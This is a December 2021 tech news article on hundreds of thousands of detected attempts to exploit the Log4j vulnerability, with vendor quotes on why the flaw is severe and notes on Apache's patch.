UPDATED 13:06 EDT / DECEMBER 13 2021

SECURITY

Researchers detect hundreds of thousands of Log4j cyberattack attempts

Researchers at two cybersecurity companies have detected hundreds of thousands of attempts to launch cyberattacks using the recently disclosed vulnerability in Log4j. 

The number of hacking attempts is particularly alarming because the vulnerability was only discovered last Thursday. 

Check Point Software Technologies Ltd., a publicly traded cybersecurity provider, said it has blocked more than 800,000 Log4j-related breach attempts. Sophos Group PLC, in turn, has detected “hundreds of thousands” of cyberattacks, the breach prevention giant disclosed on Sunday.

Log4j is a popular open-source tool for collecting diagnostics data from applications written in the Java programming language. On Thursday, it was revealed that a critical security flaw in Log4j can be used by hackers to breach vulnerable systems. Check Point Software has called the flaw “one of the most serious vulnerabilities on the internet in recent years.”

There are several reasons why the vulnerability is so severe. One is the fact that Log4j is widely used in enterprise applications: The tool has been downloaded more than 400,000 times from GitHub to date. Moreover, Log4j is included in many popular open-source frameworks as a built-in component. Apple Inc. and Microsoft Corp. are among the major companies known to use Log4j in some of their systems.

Another reason why the vulnerability represents a major cybersecurity risk is that it’s relatively easy for hackers to exploit. According to Microsoft researchers, hackers can activate the vulnerability by sending a malicious string, or series of characters, to a vulnerable application.

Logging tools such as Log4j are frequently deployed in such a way that they ingest some of the data processed by the workload to which they’re added. For example, Log4j might ingest some of the passwords that users type into an application’s login form. According to Microsoft, that means hackers can in theory compromise a vulnerable application simply by entering a malicious string into its login form or another part of the interface.

“Successful exploitation allows for arbitrary code execution in the targeted application,” Microsoft researchers explained in a blog post. “Attackers do not need prior access to the system to log the string and can remotely cause the logging event by using commands like curl against a target system to log the malicious string in the application log.”

“It is also likely that internal vulnerable systems may be targeted with post-compromise activity for lateral movement within the affected enterprise,” explained researchers from Cisco Systems Inc.’s Talos cybersecurity unit. Lateral movement is the term for cyberattacks that use a compromised device or application to infect other systems in the same network. 

According to Check Point Software, more than 60 versions of the original exploit emerged within 24 hours of its publication. Microsoft researchers have also determined that hackers are using multiple tactics to target vulnerable systems.

The Apache Software Foundation, which is responsible for the development of Log4j, has released a patch that fixes the vulnerability. The open-source group also published a guide on how administrators can block hacking attempts if downloading the patch is not possible.

A number of cybersecurity providers, including Sophos, Check Point Software, Cloudflare Inc. and others, have taken steps to protect customers whose infrastructure may contain vulnerable Log4j deployments. 

Image: Unsplash

A message from John Furrier, co-founder of SiliconANGLE:

Your vote of support is important to us and it helps us keep the content FREE.

One click below supports our mission to provide free, deep, and relevant content.  

Join our community on YouTube

Join the community that includes more than 15,000 #CubeAlumni experts, including Amazon.com CEO Andy Jassy, Dell Technologies founder and CEO Michael Dell, Intel CEO Pat Gelsinger, and many more luminaries and experts.

“TheCUBE is an important partner to the industry. You guys really are a part of our events and we really appreciate you coming and I know people appreciate the content you create as well” – Andy Jassy

THANK YOU